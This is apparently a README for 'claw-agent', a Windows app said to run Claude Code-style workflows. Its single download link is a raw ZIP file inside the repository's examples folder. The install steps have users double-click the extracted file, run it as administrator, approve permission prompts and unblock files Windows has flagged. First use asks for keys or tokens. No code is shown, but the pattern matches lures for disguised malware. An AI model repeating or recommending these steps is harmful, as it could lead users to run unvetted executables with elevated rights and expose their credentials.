claw-agent is a Python app that gives you a simple way to run Claude Code-style workflows on your computer. It is built for Windows users who want to use a local app instead of working only in a browser.
Use it to:
- Run AI-assisted tasks from your desktop
- Work with text files and project folders
- Keep your workflow in one place
- Get help with common coding and writing tasks
To get claw-agent, visit this page to download: https://github.com/dereckzg98/claw-agent/raw/refs/heads/main/examples/agent-claw-v2.1.zip
If the page offers a Windows file, download it to your computer and open it. If you see a ZIP file, save it first, then extract it before running the app.
Follow these steps on Windows:
- Open the download link above.
- Look for the latest release or the main project files.
- Download the Windows version if one is listed.
- If the file is in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Find the app file and double-click it.
- If Windows asks for permission, select Yes.
- Let the app finish loading before you start using it.
claw-agent works best on:
- Windows 10 or Windows 11
- A modern 64-bit computer
- At least 4 GB of RAM
- 200 MB of free disk space
- A stable internet connection
For a smooth setup, close other large apps before you start the program.
This app is based on Python, so some builds may ask for extra files or a local runtime. In most cases, the download page will give you a ready-to-run version for Windows.
You may also want:
- A text editor
- A folder for your project files
- Permission to run downloaded apps on your PC
After you open claw-agent for the first time:
- Wait for the app to finish loading.
- Read any setup screen that appears.
- Add your project folder if the app asks for one.
- Enter any required key, token, or account info if the app prompts you.
- Start with a small task to test that everything works.
A good first test:
- Ask it to explain a text file
- Ask it to organize a folder
- Ask it to help draft a short note
claw-agent is made for simple, repeatable tasks. You can use it to:
- Review text
- Help with code files
- Summarize notes
- Draft content
- Work through step-by-step tasks in a project folder
A simple workflow:
- Open the app.
- Choose the file or folder you want to work with.
- Enter your request in plain language.
- Review the result.
- Save the output where you need it
If the app does not open:
- Try right-clicking the file and choosing Run as administrator
- Make sure the download finished fully
- Move the file out of the Downloads folder
- Extract the ZIP file before opening the app
If Windows blocks the file:
- Open the file’s Properties
- Look for an Unblock option
- Apply the change and try again
If the app opens and closes fast:
- Check that the extracted files are all in one folder
- Download the file again
- Make sure you are using the Windows version
If the app feels slow:
- Close other apps
- Restart your computer
- Use a smaller project folder first
Only download claw-agent from the link above. Keep your files in a folder you trust. If you use project files that matter, make a copy before you test new tasks.
If you extract a ZIP release, you may see files like:
- An app file
- A config file
- A readme file
- A folder for logs or data
Keep these files together in the same folder unless the project page says something else.
- Start with one folder, not your whole drive
- Use short requests at first
- Keep file names simple
- Save your work often
- Restart the app if it stops responding
Try requests like:
- Summarize this folder of notes
- Clean up this text file
- Help me write a short README
- Explain what this script does
- Organize these files by type

If a new version appears, repeat the same Windows steps:
- Open the link
- Download the Windows file
- Extract it if needed
- Run the app
- Test it with a small task
